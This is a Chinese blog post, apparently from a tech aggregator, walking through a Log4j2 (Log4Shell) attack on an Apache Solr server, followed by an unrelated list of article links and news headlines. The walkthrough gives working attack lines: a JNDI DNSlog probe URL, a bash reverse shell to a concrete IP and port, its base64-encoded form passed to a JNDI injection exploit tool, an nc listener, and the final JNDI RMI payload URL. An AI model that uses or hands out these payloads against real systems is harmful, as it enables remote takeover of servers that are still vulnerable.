当前位置: 首页 > news >正文

log4j2漏洞:反弹shell

 在dns.log生成一个网址

 将得到的网址上传上去

http://39.105.61.160:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.6tioul.dnslog.cn}

 得到回显,表示操作已执行,证明漏洞存在

 在云服务器上构建恶意的类

将要执行的恶意操作的代码进行base64编码

bash -i>& /dev/tcp/39.105.61.160/8888 0>&1

 将代码放到云服务器执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzM5LjEwNS42MS4xNjAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A "39.105.61.160"

再开一个云服务器,监听8888端口 

nc -lvvp 8888

 

 将此代码送去执行

http://39.105.61.160:8983/solr/admin/cores?action=${jndi:rmi://38.105.61.160:1099/1v8x0q}

 之后再监听的云服务器得到消息,完成反弹shell

相关文章:

  • maven导入本地jar包
  • C++抽象与类的核心概念解析
  • 粗解JQHttpServer
  • 如何优化 TCP/IP 的 NCCL 通信
  • 地图(六)利用python绘制连接地图
  • 【QT:窗口】
  • 小程序API —— 51小程序界面交互 - loading 提示框
  • 旅游类小程序界面设计
  • 基于HetEmotionNet框架的多模态情绪识别系统
  • 实战2. 利用Pytorch解决 CIFAR 数据集中的图像分类为 10 类的问题——提高精度
  • 施磊老师c++(八)
  • 唤起“栈”的回忆
  • 【数据结构】栈与队列:基础 + 竞赛高频算法实操(含代码实现)
  • Web测试
  • 神聖的綫性代數速成例題7. 逆矩陣的性質、逆矩陣的求法
  • 深度学习-yolo实战项目【分类、目标检测、实例分割】?如何创建自己的数据集?如何对数据进行标注?没有GPU怎么办呢?
  • 计算机网络基础:网络配置与管理
  • ImGui 学习笔记(五) —— 字体文件加载问题
  • Redis集群扩容实战指南:从原理到生产环境最佳实践
  • DICOM医学影像数据加密技术应用的重要性及其实现方法详解
  • 流失海外79年,两卷战国帛书回归祖国
  • 探秘多维魅力,长江经济带、珠三角媒体总编辑岳阳行启动
  • 警方通报男子广州南站持刀伤人:造成1人受伤,嫌疑人被控制
  • 俄外交部:俄乌伊斯坦布尔谈判改在当地时间15日下午举行
  • 证监会:2024年依法从严查办证券期货违法案件739件,作出处罚决定592件、同比增10%
  • 沪指跌0.68%报3380.82点,创指跌1.92%:券商、军工跌幅靠前